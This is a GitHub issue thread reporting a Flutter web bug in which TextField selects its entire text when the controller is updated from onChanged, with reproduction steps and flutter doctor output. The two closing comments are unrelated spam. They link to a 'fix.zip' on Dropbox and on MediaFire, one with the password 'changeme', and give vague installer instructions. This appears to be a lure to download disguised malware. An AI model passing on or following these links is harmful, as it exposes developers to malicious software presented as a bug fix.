### ISSUE TITLE
[web] TextField/TextFormField selects entire text on TextEditingValue offset being -1

### ISSUE THREAD

**Issue by Fernthedev** [flutter/flutter#154085]
### Steps to reproduce

This seems to be exclusive to Flutter web. Flutter on Windows, macOS, iOS and Android do not exhibit this behaviour.

While the code example is obviously not an optimal implementation of a TextField, it resembles my project's Riverpod setup which induces this behaviour. I tried looking for previous occurrences of the bug in the Flutter issues page though did not find any.

1. Add a `TextField`/`TextFormField` in a `StatefulWidget`
2. Link the text field to a `TextEditingController`.
3. Use the `onChanged` callback on the field to listen to changes, rather than the controller's `addListener` callback.
4. Update the controller's text value on the `onChanged` callback.
5. Test the widget by typing in the text field.

### Expected results

The selection cursor should remain in its previous position from typing in the value as a normal text field would react. Essentially, a normal text field user interaction.

### Actual results

The selection gets reset to the entire text upon typing. This causes the user to overwrite the previous value when the second character is inserted.

### Code sample

https://dartpad.dev/?id=bf8a7b75ab6a46956c0ad655d21a112a

### Flutter Doctor output

<details open><summary>Doctor output</summary>

```console
[√] Flutter (Channel stable, 3.24.0, on Microsoft Windows [Version 10.0.19045.4780], locale en-US)
    • Flutter version 3.24.0 on channel stable at E:\SSDUse\DevPrograms\flutter
    • Upstream repository https://github.com/flutter/flutter.git
    • Framework revision 80c2e84975 (4 weeks ago), 2024-07-30 23:06:49 +0700
    • Engine revision b8800d88be
    • Dart version 3.5.0
    • DevTools version 2.37.2

[√] Windows Version (Installed version of Windows is version 10 or higher)

[√] Android toolchain - develop for Android devices (Android SDK version 34.0.0)
    • Android SDK at E:\SSDUse\AppData\Android\SDK
    • Platform android-34, build-tools 34.0.0
    • Java binary at: E:\SSDUse\Program Files\Android\Android Studio\jbr\bin\java
    • Java version OpenJDK Runtime Environment (build 17.0.6+0-b2043.56-9586694)
    • All Android licenses accepted.

[√] Chrome - develop for the web
    • CHROME_EXECUTABLE = C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe

[√] Visual Studio - develop Windows apps (Visual Studio Community 2022 17.6.0 Preview 7.0)
    • Visual Studio at C:\Program Files\Microsoft Visual Studio\2022\Preview
    • Visual Studio Community 2022 version 17.6.33706.43
    • The current Visual Studio installation is a pre-release version. It may not be supported by Flutter yet.
    • Windows 10 SDK version 10.0.20348.0

[√] Android Studio (version 2022.2)
    • Android Studio at E:\SSDUse\Program Files\Android\Android Studio
    • Flutter plugin can be installed from:
       https://plugins.jetbrains.com/plugin/9212-flutter
    • Dart plugin can be installed from:
       https://plugins.jetbrains.com/plugin/6351-dart
    • Java version OpenJDK Runtime Environment (build 17.0.6+0-b2043.56-9586694)

[√] IntelliJ IDEA Ultimate Edition (version 2024.1)
    • IntelliJ at C:\Program Files\JetBrains\IntelliJ IDEA 2021.1.2
    • Flutter plugin can be installed from:
       https://plugins.jetbrains.com/plugin/9212-flutter
    • Dart plugin can be installed from:
       https://plugins.jetbrains.com/plugin/6351-dart

[√] VS Code (version 1.92.2)
    • VS Code at C:\Users\fernr\AppData\Local\Programs\Microsoft VS Code
    • Flutter extension version 3.22.0

[√] Connected device (3 available)
    • Windows (desktop) • windows • windows-x64    • Microsoft Windows [Version 10.0.19045.4780]
    • Chrome (web)      • chrome  • web-javascript • unknown
    • Edge (web)        • edge    • web-javascript • Microsoft Edge 128.0.2739.42

[√] Network resources
    • All expected network resources are available.

• No issues found!
```

</details>

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
